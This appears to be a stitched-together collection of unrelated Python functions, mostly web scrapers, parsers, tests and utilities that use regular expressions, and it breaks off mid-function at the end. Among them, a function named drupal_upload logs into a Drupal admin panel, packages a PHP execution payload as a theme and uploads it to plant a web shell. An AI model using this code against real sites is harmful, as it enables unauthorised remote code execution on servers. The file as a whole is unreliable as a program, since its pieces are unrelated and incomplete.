def getCategoryUrl(site="", url=""):
    catDb = openTable(tableName=global_setting['catTable'])
    r = session.get(url)
    if not r.text:
        return False
    soup = BeautifulSoup(r.text)
    for level1 in soup.select('.classify_books'):
        curLevel1 = level1.select('.classify_title')[0].text
        curLevel1 = re.sub('\s', '', curLevel1)
        for level2 in level1.select('.classify_kind'):
            curLevel2 = level2.select('.classify_kind_name')[0].text
            curLevel2 = re.sub('\s', '', curLevel2)
            for level3 in level2.select('ul li a'):
                #curLevel3 = re.sub('\s', '', level3.text)
                curLevel3 = level3.text.strip()
                curlUrl = level3['href']
                retFind = re.findall(r'\/cp(.*)\.html', curlUrl)
                if retFind:
                    curCatID = retFind[0]
                    catType = 'book'
                else:
                    retFind = re.findall(r'\/cid(.*)\.html', curlUrl)
                    if retFind:
                        curCatID = retFind[0]
                        catType = 'nonbook'
                if retFind:
                    if catDb.find({'catId': curCatID}).count() > 0:
                        logger.debug('category %s exists, skip\n' % (curCatID))
                    else:
                        catDb.insert({'catId': curCatID, 'level1': curLevel1,
                                      'level2': curLevel2, 'level3': curLevel3,
                                      'catUrl': curlUrl, 'catType': catType,
                                      'site': site})
    return True
def DownloadUpdate(self, file):
    self.log('Downloading: %s' % file)
    dirfile = os.path.join(self.UpdateTempDir, file)
    dirname, filename = os.path.split(dirfile)
    if not os.path.isdir(dirname):
        try:
            os.makedirs(dirname)
        except:
            self.log('Error creating directory: ' + dirname)
    url = self.SVNPathAddress + urllib.quote(file)
    try:
        if re.findall(".xbt", url):
            self.totalsize = int(re.findall("File length: ([0-9]*)",
                                            urllib2.urlopen(url + "?view=log").read())[0])
        urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
        self.DownloadedFiles.append(urllib.unquote(url))
        return 1
    except:
        try:
            time.sleep(2)
            if re.findall(".xbt", url):
                self.totalsize = int(re.findall("File length: ([0-9]*)",
                                                urllib2.urlopen(url + "?view=log").read())[0])
            urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
            self.DownloadedFiles.append(urllib.unquote(url))
            return 1
        except:
            self.log("Download failed: %s" % url)
            self.DownloadFailedFiles.append(urllib.unquote(url))
            return 0
def same_url(raw_url1, raw_url2):
    """Check if 2 URLs refer to the same primary resource.

    `urltools.compare()` fails if the 2 URLs have different fragments.
    See issue #8 for details. The function treats a special case where the
    path is simply '/blog' to accommodate some blogs that refer to their
    posts via the fragment.

    Args:
        url1 (str): First URL to be compared
        url2 (str): Second URL

    Returns:
        bool: Whether the URLs are the same
    """
    arxiv_exception = 'arxiv.org'
    fragment_identifier = '#'
    url1 = _parse_url(raw_url1)
    url2 = _parse_url(raw_url2)
    # If it's on arxiv, do some acrobatics
    if url1['netloc'] == url2['netloc'] == arxiv_exception:
        regex = '([^/a-z]+\.[^/a-z.]+)'
        return re.findall(regex, url1['path']) == re.findall(regex, url2['path'])
    else:
        return urltools.compare(_normalize_url(raw_url1), _normalize_url(raw_url2))
def update_lyrics(request):
    b = open('./artistList.txt', 'r')
    bb = b.read()
    b.close()
    bbb = bb.split(chr(10))
    for ar in bbb:
        if ar.split('=')[1] == '1':
            return index(request)
        furl = "/" + ar.split('=')[1] + ".htm"
        ar = ar.split('=')[0]
        artxt = ''
        #req = urllib2.Request(u"http://mojim.com/"+ar+".html?t1")
        #print "connected >> http://mojim.com/"+ar+".html?t1"
        #response = urllib2.urlopen(req)
        #result = response.read()
        print '--', furl, '--'
        if len(furl) > 0:
            req2 = urllib2.Request("http://mojim.com" + furl)
            response2 = urllib2.urlopen(req2)
            result2 = response2.read()
            furl2 = re.findall('/tw[0-9x]*.htm', result2)
            iii = -1
            if len(furl2) > 0:
                for furl3 in furl2:
                    iii = iii + 1
                    if iii % 2 == 0:
                        continue
                    try:
                        req3 = urllib2.Request("http://mojim.com" + furl3)
                        response3 = urllib2.urlopen(req3)
                        result3 = response3.read()
                        lasturl = re.findall('<dl><dt><br /><br />[^^]*</div>', result3)
                        #a = raw_input()
                        artxt = lasturl[0].replace('更多更詳盡歌詞', '').replace(u'在 ', '').replace(u'Mojim.com', '').replace(u'※', '').replace('魔鏡歌詞網', '')
                        aaaaaaaa = re.findall(u'title="歌詞(.*)">', artxt)
                        bbbbbbbb = re.findall('<dd><br />(.*)</dd>', artxt)
                        bCnt = len(bbbbbbbb)
                        for bi in range(0, bCnt):
                            if len(bbbbbbbb[bi]) > 22:
                                lv = LyricsView()
                                ll = striphtml(bbbbbbbb[bi].encode('Shift_JIS').replace('<br />', '\r'))
                                ll = ll[:len(ll) - 24]
                                lv.setParams({'artist': ar, 'title': aaaaaaaa[bi], 'lyrics': ll})
                                lv.save()
                    except:
                        pass
        '''a = open(u''+ar+'.html', 'w')
        a.write(artxt)
        a.close()'''
    return index(request)
def ident_author(name, pp=prompt_possibles):
    orig_name = name
    name = ''.join(re.findall('[A-Z0-9]+', name.upper()))
    best_authors = []
    with open('sample_data/author_names.json', 'r') as f:
        j = json.load(f)
    for b in j['results']['bindings']:
        author_orig = b['name']['value']
        uri = b['author']['value']
        author = b['name']['value'].upper()
        subnames = author_orig.split()
        author = ''.join(re.findall('[A-Z0-9]+', author))
        dist = jaccard_ngram_dist(name, author, 3)
        best_authors.append(((author_orig, uri), dist))
        if len(subnames) >= 2:
            for sname in [subnames[0], subnames[-1]]:
                sname = ''.join(re.findall('[A-Z0-9]+', sname))
                dist = jaccard_ngram_dist(name, sname, 3)
                best_authors.append(((author_orig, uri), dist))
        if len(best_authors) > 20:
            best_authors.sort(key=lambda x: x[1])
            best_authors = best_authors[:5]
    best_authors.sort(key=lambda x: x[1])
    best_authors = best_authors[:5]
    best_dist = best_authors[0][1]
    possibles = [best_authors[0][0]]
    for author, dist in best_authors[1:]:
        percent_diff = (dist - best_dist) * 2 / float(dist + best_dist)
        if percent_diff < __CUTOFF__:
            possibles.append(author)
    if len(possibles) > 1:
        identified = pp(orig_name, possibles)
    else:
        identified = possibles[0]
    return identified
def run_query(self, query):
    '''Run a query, returning the results as a list of dictionaries.

    When unknown output is encountered, OsqueryUnknownException is thrown.
    When osqueryi returns an error, OsqueryException is thrown.
    '''
    query = query + ';'  # Extra semicolon causes no harm
    result = self.run_command(query)
    # On Mac, the query appears first in the string. Remove it if so.
    result = re.sub(re.escape(query), '', result).strip()
    result_lines = result.splitlines()
    if len(result_lines) < 1:
        raise OsqueryUnknownException(
            'Unexpected output:\n %s' % result_lines)
    if result_lines[0].startswith(self.ERROR_PREFIX):
        raise OsqueryException(result_lines[0])
    try:
        header = result_lines[1]
        columns = re.findall('[^ |]+', header)
        rows = []
        for line in result_lines[3:-1]:
            values = re.findall('[^ |]+', line)
            rows.append(
                dict((col, val) for col, val in zip(columns, values)))
        return rows
    except:
        raise OsqueryUnknownException(
            'Unexpected output:\n %s' % result_lines)
def summary_up_result(result_file, ignore, row_head, column_mark):
    """
    Used to summarize the monitor results or other kinds of results. It
    calculates the average value for each item in the results and fits
    records that are in matrix form.

    @result_file: files which need to be calculated
    @ignore: pattern for comments in the results which need to be thrown away
    @row_head: pattern for the items in a row
    @column_mark: pattern for the first line of the matrix which is used to
    generate the items in a column
    Return: A dictionary with the average value of results
    """
    head_flag = False
    result_dict = {}
    column_list = {}
    row_list = []
    fd = open(result_file, "r")
    for eachLine in fd:
        if len(re.findall(ignore, eachLine)) == 0:
            if len(re.findall(column_mark, eachLine)) != 0 and not head_flag:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[i] = {}
                        column_list[column] = i
                        column += 1
                head_flag = True
            elif len(re.findall(column_mark, eachLine)) == 0:
                column = 0
                _, row, eachLine = re.split(row_head, eachLine)
                row_flag = False
                for i in row_list:
                    if row == i:
                        row_flag = True
                if row_flag is False:
                    row_list.append(row)
                    for i in result_dict:
                        result_dict[i][row] = []
                for i in re.split("\s+", eachLine):
                    if i:
                        result_dict[column_list[column]][row].append(i)
                        column += 1
    fd.close()

    # Calculate the average value
    average_list = {}
    for i in column_list:
        average_list[column_list[i]] = {}
        for j in row_list:
            average_list[column_list[i]][j] = {}
            check = result_dict[column_list[i]][j][0]
            if utils_misc.aton(check) or utils_misc.aton(check) == 0.0:
                count = 0
                for k in result_dict[column_list[i]][j]:
                    count += utils_misc.aton(k)
                average_list[column_list[i]][j] = "%.2f" % (count / len(result_dict[column_list[i]][j]))
    return average_list
def weatherReport():
    htmlfile = urllib.urlopen('http://www.weather.com/weather/today/Mahomet+IL+61853:4:US')
    htmltext = htmlfile.read()
    rnTemp = '<span itemprop="temperature-fahrenheit">(.+?)</span>'
    conditions = '<div class="wx-phrase ">(.+?)</div>'
    tonightTemp = '<div class="wx-temperature">(.+?)</div>'
    rntPattern = re.compile(rnTemp)
    conditionsPattern = re.compile(conditions)
    tonightTempPattern = re.compile(tonightTemp)
    rntInstance = re.findall(rntPattern, htmltext)
    conditionsInstance = re.findall(conditionsPattern, htmltext)
    tonightTempInstance = re.findall(tonightTempPattern, htmltext)
    currentConditions = conditionsInstance[0]
    tonightConditions = conditionsInstance[2]
    currentTemp = rntInstance[0]
    tonightTemp = tonightTempInstance[2][:2]
    print currentTemp
    to = ['*****@*****.**', '*****@*****.**']
    sender = 'weather.bot1'
    subject = 'Your Daily Weather Forecast is Here'
    bodymsg = "Right now: " + currentTemp + ' degrees.' + ' ' + currentConditions + '.' + "\n" + \
              "Tonight: " + tonightTemp + ' degrees.' + ' ' + tonightConditions + '.\n\n' + \
              "Read more about today's weather here: " \
              "http://www.weather.com/weather/today/Mahomet+IL+61853:4:US" + "\n" + \
              "This message was made by request via WeatherBot.\nHave a great day."
    for address in to:
        createMessage(address, '*****@*****.**', 'skytower', subject, bodymsg)
    return
def wigle_print(username, password, netid):
    browser = mechanize.Browser()
    browser.open('http://wigle.net')
    reqData = urllib.urlencode({'credential_0': username,
                                'credential_1': password})
    browser.open('https://wigle.net//gps/gps/main/login', reqData)
    params = {}
    params['netid'] = netid
    reqParams = urllib.urlencode(params)
    respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
    resp = browser.open(respURL, reqParams).read()
    mapLat = 'N/A'
    mapLon = 'N/A'
    rLat = re.findall(r'maplat=.*\&', resp)
    if rLat:
        mapLat = rLat[0].split('&')[0].split('=')[1]
    rLon = re.findall(r'maplon=.*\&', resp)
    if rLon:
        # mirror the latitude parsing above
        mapLon = rLon[0].split('&')[0].split('=')[1]
    print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
def _strip_and_unquote_list(keys, value):
    if value[0] == '"':
        # double-quoted values
        m = _DQV.match(value)
        if m:
            value = m.groups()[0]
            values = re.findall(_DQ_L_VALUE, value)
    elif value[0] == "'":
        # single-quoted values
        m = _SQV.match(value)
        if m:
            value = m.groups()[0]
            values = re.findall(_SQ_L_VALUE, value)
    else:
        # unquoted values
        # (may contain internal quoted strings with list delimiters inside 'em!)
        m = _DQV.match(value)
        if m:
            value = m.groups()[0]
        else:
            n = _SQV.match(value)
            if n:
                value = n.groups()[0]
        values = list(_unquoted_list_parse(keys, value))
    # allow trailing commas
    if values[-1] == '':
        values = values[0:-1]
    return values
def test_list(self):
    # list apps and get their names
    child = pexpect.spawn("{} apps".format(DEIS))
    child.expect('=== Apps')
    child.expect(pexpect.EOF)
    apps_before = re.findall(r'([-_\w]+) {\w?}', child.before)
    # create a new app
    self.assertIsNotNone(self.formation)
    child = pexpect.spawn("{} apps:create --formation={}".format(
        DEIS, self.formation))
    child.expect('done, created ([-_\w]+)')
    app = child.match.group(1)
    child.expect(pexpect.EOF)
    # list apps and get their names
    child = pexpect.spawn("{} apps".format(DEIS))
    child.expect('=== Apps')
    child.expect(pexpect.EOF)
    apps = re.findall(r'([-_\w]+) {\w?}', child.before)
    # test that the set of names contains the previous set
    self.assertLess(set(apps_before), set(apps))
    # delete the app
    child = pexpect.spawn("{} apps:destroy --app={} --confirm={}".format(
        DEIS, app, app))
    child.expect('done in ', timeout=5 * 60)
    child.expect(pexpect.EOF)
    # list apps and get their names
    child = pexpect.spawn("{} apps:list".format(DEIS))
    child.expect('=== Apps')
    child.expect(pexpect.EOF)
    apps = re.findall(r'([-_\w]+) {\w?}', child.before)
    # test that the set of names is equal to the original set
    self.assertEqual(set(apps_before), set(apps))
def parse_cpu_time(time):
    # return the duration in milliseconds
    # time may be '12m53s', or '0.01s'
    hour_match = re.findall(r'\d+h', time)
    minute_match = re.findall(r'\d+m', time)
    sec_match = re.findall(r'[0-9]+\.*[0-9]*s', time)
    if len(hour_match) == 0:
        hour = 0
    else:
        hour = int(hour_match[0][:-1])
    if len(minute_match) == 0:
        minute = 0
    else:
        minute = int(minute_match[0][:-1])
    if len(sec_match) == 0:
        sec = 0
    else:
        sec = float(sec_match[0][:-1])
    # Return time in units of ms (milliseconds)
    time_ret = int((sec + (minute * 60) + (hour * 3600)) * 1000)
    return time_ret
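# Usage sketch with hypothetical inputs, assuming parse_cpu_time() above and `re` are in scope:
assert parse_cpu_time('12m53s') == (12 * 60 + 53) * 1000  # 773000 ms
assert parse_cpu_time('2h') == 2 * 3600 * 1000            # 7200000 ms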
def __search(self, titles, year, season='0'):
    try:
        query = self.search_link % (urllib.quote_plus(titles[0]))
        query = urlparse.urljoin(self.base_link, query)

        t = [cleantitle.get(i) for i in set(titles) if i]
        y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']

        r = client.request(query)

        r = dom_parser.parse_dom(r, 'div', attrs={'class': 'list_movies'})
        r = dom_parser.parse_dom(r, 'div', attrs={'class': 'item_movie'})
        r = dom_parser.parse_dom(r, 'h2', attrs={'class': 'tit'})
        r = dom_parser.parse_dom(r, 'a', req='href')
        r = [(i.attrs['href'], i.content.lower()) for i in r if i]
        r = [(i[0], i[1], re.findall('(.+?) \(*(\d{4})', i[1])) for i in r]
        r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
        r = [(i[0], i[1], i[2], re.findall('(.+?)\s+(?:\s*-?\s*(?:season|s))\s*(\d+)', i[1])) for i in r]
        r = [(i[0], i[3][0][0] if len(i[3]) > 0 else i[1], i[2], i[3][0][1] if len(i[3]) > 0 else '0') for i in r]
        r = [(i[0], i[1], i[2], '1' if int(season) > 0 and i[3] == '0' else i[3]) for i in r]
        r = sorted(r, key=lambda i: int(i[2]), reverse=True)  # with year > no year
        r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y and int(i[3]) == int(season)][0]

        return source_utils.strip_domain(r)
    except:
        return
def drupal_upload(url, login, pwd):
    print '[*] Trying to install theme with shell.'
    dpl_sess = drupal_admin(url, login, pwd)
    info = 'name = ' + globals.SHELL_NAME + '\ndescription = ' + globals.SHELL_NAME + '\npackage = public-action\nversion = VERSION\ncore = 7.x\nfiles[] = ' + globals.SHELL_EXT
    page = dpl_sess.get(url + "?q=admin/appearance/install")
    token1 = re.findall('<input type="hidden" name="form_build_id" value="(.*?)" />', page.text)
    token2 = re.findall('<input type="hidden" name="form_token" value="(.*?)" />', page.text)
    if (token1 == []) or (token2 == []):
        print '[-] Failed to get token. Login or password incorrect, or unsupported Drupal version.'
        sys.exit()
    post = {'form_build_id': str(token1[0]),
            'form_token': str(token2[0]),
            'form_id': 'update_manager_install_form',
            'op': 'Install'}
    print '[*] Creating %s.zip in current folder.' % (globals.SHELL_NAME)
    arch = zipfile.ZipFile(globals.SHELL_NAME + ".zip", 'w')
    arch.writestr(globals.SHELL_NAME + "/" + globals.SHELL_EXT, globals.PHP_EXEC)
    arch.writestr(globals.SHELL_NAME + "/" + globals.SHELL_NAME + ".info", info)
    arch.close()
    file = {'files[project_upload]': (globals.SHELL_NAME + ".zip", open(globals.SHELL_NAME + ".zip", 'rb'), 'application/zip')}
    print '[*] Trying to upload zip file.'
    up = dpl_sess.post(url + "?q=admin/appearance/install", files=file, data=post, timeout=None)
    get_link = re.findall('URL=(.*?)" />', up.text)
    if not get_link:
        print '[-] Failed to upload zip file. Try one more time.'
        sys.exit()
    link = str(get_link[0]).replace('&amp;', '&')
    dpl_sess.get(link)
    shell = url + "sites/all/themes/" + globals.SHELL_NAME + "/" + globals.SHELL_EXT
    check = dpl_sess.get(shell)
    if check.status_code == 200:
        return shell
    else:
        print '[-] Themes or tmp directories are not writable.'
        sys.exit()
def __load_testdata(file):
    """
    Reads the testdata out of a file.  Testdata consists of exactly three
    strings on each line, each one enclosed in quotation marks (" or ').
    The first is the filename to be parsed, the second is the series name
    that should be parsed out of it, and the third is the issue number
    string that should be parsed out of it.  Blank lines and lines that
    begin with # are ignored.
    """
    retval = []
    if File.Exists(file):
        with StreamReader(file, Encoding.UTF8, False) as sr:
            line = sr.ReadLine()
            while line is not None:
                line = line.strip()
                if len(line) > 0 and not line.startswith("#"):
                    if line.startswith('"'):
                        data = re.findall(r'"(.*?)"', line)
                    else:
                        data = re.findall(r"'(.*?)'", line)
                    if len(data) == 3:
                        data.append("")
                    if len(data) != 4:
                        raise Exception("badly formatted test data")
                    retval.append(data)
                line = sr.ReadLine()
    return retval
def process_line_exceptions(line, extra_tags):
    global except_base_tag

    if not ' ' in line or re.match('.*[а-яіїєґ]/.*', line):
        return line
    if re.match('^[^ ]+ [^ ]+ [^:]?[a-z].*$', line):
        return line
    if line.startswith('# !'):
        except_base_tag = re.findall('![a-z:-]+', line)[0][1:] + ':'
        return ''

    base = re.findall('^[^ ]+', line)[0]
    except_base_tag2 = except_base_tag
    if base.endswith('ся'):
        except_base_tag2 = except_base_tag.replace('verb:', 'verb:rev:')

    out_line = re.sub('([^ ]+) ?', '\\1 ' + base + ' ' + except_base_tag2 + 'unknown' + extra_tags + '\n', line)

    if except_base_tag in ('verb:imperf:', 'verb:perf:'):
        base_add = 'inf:'
        # if base.endswith('ся'):
        #     base_add = 'rev:' + base_add
        out_line = re.sub("(verb:(?:rev:)?)((im)?perf:)", "\\1inf:\\2", out_line, 1)

    out_lines = out_line.split('\n')
    out_lines[0] = out_lines[0].replace(':unknown', '')
    out_line = '\n'.join(out_lines)

    return out_line[:-1]
def get_episode(self, url):
    html = self.fetch_url(url)
    divs = re.findall(r'<div id="fenji_\d+_(asc|\d+)"(.*?)<\/div>', html)
    result = []
    if divs:
        for div in divs:
            # link / "episode N" / sub-title
            r = re.findall(r'<h3><a href="(.*?)" target="_blank" title=".*?">.*?(第\d+集)<\/a></h3><h4>(.+?)</h4>', div[1])
            if r:
                # TV series
                for ep_data in r:
                    result.append({"title": ep_data[1] + " " + ep_data[2], "img": "", "url": ep_data[0]})
            else:
                # link / title / sub-title / issue number (date)
                r = re.findall(r'<h3><a href="(.*?)" target="_blank" title="(.*?)">(.*?)<\/a></h3><h4>(.+?)期</h4>', div[1])
                if r:
                    # variety show
                    for ep_data in r:
                        dateA = ep_data[3].split("-")
                        date = ""
                        if len(dateA) == 3:
                            # e.g. 2012-08-12
                            date = "%s.%s.%s" % (dateA[2], dateA[1], dateA[0])
                        result.append({"title": ep_data[1] + " " + ep_data[2], "img": "", "url": ep_data[0], "date": date})
    return result

#aa = IkankanResolver("http://data.movie.kankan.com/movie/38534?id=731018")
def LISTSHOWS(murl, channel, index=False):
    link = main.OPENURL(murl)
    link = link.replace('\r', '').replace('\n', '').replace('\t', '').replace(' ', '')
    match = re.findall('<div class="titleline"><h2 class="forumtitle"><a href="(.+?)">(.+?)</a></h2></div>', link)
    label = 'TV Shows'
    if not len(match) > 0:
        match = re.findall('<h3 class="threadtitle">.+?<a class=".+?" href="(.+?)" id=".+?">(.+?)</a></h3>', link)
        label = 'Movies'
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until ' + label + ' Show list is cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = label + ' loaded :: [B]' + str(loadedLinks) + ' / ' + str(totalLinks) + '[/B].'
    dialogWait.update(0, '[B]Will load instantly from now on[/B]', remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url, name in match:
        if "color" in name:
            name = name.replace('<b><font color=red>', '[COLOR red]').replace('</font></b>', '[/COLOR]')
            name = name.replace('<b><font color="red">', '[COLOR red]').replace('</font></b>', '[/COLOR]')
        if label == 'Movies':
            main.addDirX(name, MainUrl + url, 39, '', searchMeta=True, metaType='Movies')
        else:
            main.addTVInfo(name, MainUrl + url, 38, getShowImage(channel, name), '', '')
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100) / totalLinks
        remaining_display = label + ' loaded :: [B]' + str(loadedLinks) + ' / ' + str(totalLinks) + '[/B].'
        dialogWait.update(percent, '[B]Will load instantly from now on[/B]', remaining_display)
        if dialogWait.iscanceled():
            return False
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), label)
    main.VIEWS()
def LISTEPISODES(tvshowname, url):
    link = main.OPENURL(url)
    link = link.replace('\r', '').replace('\n', '').replace('\t', '').replace(' ', '')
    match = re.findall('<a class=".+?" href="(.+?)" id=".+?">(.+?)</a>', link)
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until [' + tvshowname + '] Episodes are cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = 'Episodes loaded :: [B]' + str(loadedLinks) + ' / ' + str(totalLinks) + '[/B].'
    dialogWait.update(0, '[B]Will load instantly from now on[/B]', remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url, name in match:
        if "Online" not in name:
            continue
        name = name.replace(tvshowname, '').replace('Watch Online', '')
        name = main.removeNonASCII(name)
        main.addTVInfo(name, MainUrl + url, 39, '', '', '')
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100) / totalLinks
        remaining_display = 'Episodes loaded :: [B]' + str(loadedLinks) + ' / ' + str(totalLinks) + '[/B].'
        dialogWait.update(percent, '[B]Will load instantly from now on[/B]', remaining_display)
        if dialogWait.iscanceled():
            return False
    match = re.findall('<div id="above_threadlist" class="above_threadlist">(.+?)</div>', link)
    for string in match:
        match1 = re.findall('<a href="(.+?)" title="(.+?)">[0-9]+</a>', string)
        for url, page in match1:
            main.addTVInfo(page, MainUrl + url, 38, '', '', '')
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), 'TV Shows')
    main.VIEWS()
def memory(inp):
    """memory -- Displays the bot's current memory usage."""
    if os.name == "posix":
        # get process info
        status_file = open('/proc/self/status').read()
        s = dict(re.findall(r'^(\w+):\s*(.*)\s*$', status_file, re.M))
        # get the data we need and process it
        data = s['VmRSS'], s['VmSize'], s['VmPeak'], s['VmStk'], s['VmData']
        data = [float(i.replace(' kB', '')) for i in data]
        strings = [convert_kilobytes(i) for i in data]
        # prepare the output
        out = "Threads: \x02{}\x02, Real Memory: \x02{}\x02, Allocated Memory: \x02{}\x02, Peak " \
              "Allocated Memory: \x02{}\x02, Stack Size: \x02{}\x02, Heap " \
              "Size: \x02{}\x02".format(s['Threads'], strings[0], strings[1], strings[2],
                                        strings[3], strings[4])
        # return output
        return out
    elif os.name == "nt":
        cmd = 'tasklist /FI "PID eq %s" /FO CSV /NH' % os.getpid()
        out = os.popen(cmd).read()
        memory = 0
        for amount in re.findall(r'([,0-9]+) K', out):
            memory += float(amount.replace(',', ''))
        memory = convert_kilobytes(memory)
        return "Memory Usage: \x02{}\x02".format(memory)
    else:
        return "Sorry, this command is not supported on your OS."
def compile_formula(formula, verbose=False):
    """Compile formula into a function. Also return letters found, as a str,
    in same order as parms of function. The first digit of a multi-digit
    number can't be 0. So if YOU is a word in the formula, and the function
    is called with Y equal to 0, the function should return False."""
    # modify the code in this function.
    letters = ''.join(set(re.findall('[A-Z]', formula)))
    print letters
    first_letters = set(re.findall('([A-Z])[A-Z]', formula))
    print first_letters
    checklist = ['%s!=0' % (w) for w in first_letters]
    checklist.append('1==1')
    print checklist
    check = ' and '.join(checklist)
    print check
    parms = ', '.join(letters)
    print parms
    tokens = map(compile_word, re.split('([A-Z]+)', formula))
    print tokens
    body = ''.join(tokens)
    print body
    f = 'lambda %s: %s and (%s)' % (parms, body, check)
    if verbose:
        print f
    return eval(f), letters
def parse_current_docket(docket_record):
    # grab the file with the URL mangled slightly to grab 100k records
    docket_file = urllib2.urlopen(docket_record['url'] + "&ctl00_ctl00_cphContentMain_MainContent_gvCommentListChangePage=1_100000").read()
    page = pq(etree.fromstring(docket_file, parser))

    docket = dict(docket_record)
    docket['title'] = page('.dyn_wrap h1').text().strip()
    assert docket['title'], 'no title found'

    headers = [item.text().strip() for item in page('.rgMasterTable thead th').items()]

    docket['comments'] = []

    # check if there's a no-records message
    if len(page('.rgMasterTable .rgNoRecords')):
        return docket

    for row in page('.rgMasterTable tbody tr').items():
        tds = row.find('td')
        cell_text = [item.text().strip() for item in tds.items()]
        cdata = dict(zip(headers, cell_text))

        link = pq(tds[-1]).find('a')

        doc = {
            'url': urlparse.urljoin(docket['url'], link.attr('href')),
            'details': {},
            'release': [fix_spaces(cdata['Release'])],
            'date': cdata['Date Received'],
            'doctype': 'public_submission',
        }

        vc_matches = re.findall(r"ViewComment\.aspx\?id=(\d+)", doc['url'])
        if vc_matches:
            doc['id'] = vc_matches[0]
            doc['subtype'] = 'comment'
            detail_columns = ['Organization', 'First Name', 'Last Name']
        else:
            ep_matches = re.findall(r"ViewExParte\.aspx\?id=(\d+)", doc['url'])
            if ep_matches:
                doc['id'] = "EP-%s" % ep_matches[0]
                doc['subtype'] = 'exparte'
                detail_columns = ['Organization']
            else:
                assert False, "expected either comment or exparte link: %s" % doc['url']

        for rdg_label, cftc_label in (('Organization Name', 'Organization'), ('First Name', 'First Name'), ('Last Name', 'Last Name')):
            if cftc_label in detail_columns and cdata[cftc_label]:
                doc['details'][rdg_label] = cdata[cftc_label]

        docket['comments'].append(doc)

    assert len(docket['comments']) < 100000, "we probably exceeded one page"

    # then strip out all the ones that aren't about this document
    release = fix_spaces(page('a[id*=rptReleases_hlReleaseLink]').text().strip())
    docket['comments'] = [comment for comment in docket['comments'] if comment['release'][0] == release]

    return docket
def extractSrcFileData(self, path):
    fileinput.close()
    isLocListener = False
    wakeLockAcqRegex = "invoke-virtual(.*?)Landroid/os/PowerManager$WakeLock;->acquire()"
    domRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/DocumentBuilderFactory;->newDocumentBuilder()"
    saxRegex = "invoke-virtual(.*?)Ljavax/xml/parsers/SAXParserFactory;->newSAXParser()"
    xmlppRegex = "invoke-static(.*?)Landroid/util/Xml;->newPullParser()"
    for line in fileinput.input([path]):
        matches = re.findall(wakeLockAcqRegex, line)
        if len(matches) > 0:
            self.numNoTimeoutWakeLocks = self.numNoTimeoutWakeLocks + 1
        if line.startswith(".implements Landroid/location/LocationListener;"):
            self.numLocListeners = self.numLocListeners + 1
            isLocListener = True
        if isLocListener:
            if "\"gps\"" in line:
                self.numGpsUses = self.numGpsUses + 1
        matches = re.findall(domRegex, line)
        if len(matches) > 0:
            self.numDomParser = self.numDomParser + 1
        matches = re.findall(saxRegex, line)
        if len(matches) > 0:
            self.numSaxParser = self.numSaxParser + 1
        matches = re.findall(xmlppRegex, line)
        if len(matches) > 0:
            self.numXMLPullParser = self.numXMLPullParser + 1
def _real_extract(self, url):
    video_id = self._match_id(url)
    webpage = self._download_webpage(url, video_id)

    title = self._html_search_meta('title', webpage, 'title', fatal=True)
    TITLE_SUFFIX = ' - TeacherTube'
    if title.endswith(TITLE_SUFFIX):
        title = title[:-len(TITLE_SUFFIX)].strip()

    description = self._html_search_meta('description', webpage, 'description')
    if description:
        description = description.strip()

    quality = qualities(['mp3', 'flv', 'mp4'])

    media_urls = re.findall(r'data-contenturl="([^"]+)"', webpage)
    media_urls.extend(re.findall(r'var\s+filePath\s*=\s*"([^"]+)"', webpage))
    media_urls.extend(re.findall(r'\'file\'\s*:\s*["\']([^"\']+)["\'],', webpage))

    formats = [
        {
            'url': media_url,
            'quality': quality(determine_ext(media_url))
        }
        for media_url in set(media_urls)
    ]

    self._sort_formats(formats)

    return {
        'id': video_id,
        'title': title,
        'thumbnail': self._html_search_regex(r'\'image\'\s*:\s*["\']([^"\']+)["\']', webpage, 'thumbnail'),
        'formats': formats,
        'description': description,
    }
def evalAtom(self, atom, param_names):
    if atom in self.consts:
        return '(const _%s)' % atom
    elif atom in param_names:
        return '(param (paramref \"%s\"))' % atom
    elif re.match(r'^\d+$', atom):
        return '(const (intc %s))' % atom
    elif atom.lower() in ['true', 'false']:
        return '(const (boolc %s))' % atom.lower()
    elif re.match(r'^forall.*end$', atom) or re.match(r'^exists.*?end$', atom):
        if re.match(r'^forall.*end$', atom):
            params, text = re.findall(r'forall(.*?)do(.*)end', atom)[0]
        else:
            params, text = re.findall(r'exists(.*?)do(.*)end', atom)[0]
        param_name_dict, param_defs = analyzeParams(params)
        for p in param_names:
            if p not in param_name_dict:
                param_name_dict[p] = 0
        text = self.splitText(text)
        sub_form = self.evaluate(self.process(text), param_name_dict)
        if re.match(r'^forall.*?end$', atom):
            return '(forallFormula %s %s)' % (param_defs, sub_form)
        else:
            return '(existFormula %s %s)' % (param_defs, sub_form)
    else:
        return '(var %s)' % self.evalVar(atom)
def __get_dom_elements(item, name, attrs):
    if not attrs:
        pattern = '(<%s(?:\s[^>]*>|/?>))' % (name)
        this_list = re.findall(pattern, item, re.M | re.S | re.I)
    else:
        last_list = None
        for key, value in attrs.iteritems():
            value_is_regex = isinstance(value, re_type)
            value_is_str = isinstance(value, basestring)
            pattern = '''(<{tag}[^>]*\s{key}=(?P<delim>['"])(.*?)(?P=delim)[^>]*>)'''.format(tag=name, key=key)
            re_list = re.findall(pattern, item, re.M | re.S | re.I)
            if value_is_regex:
                this_list = [r[0] for r in re_list if re.match(value, r[2])]
            else:
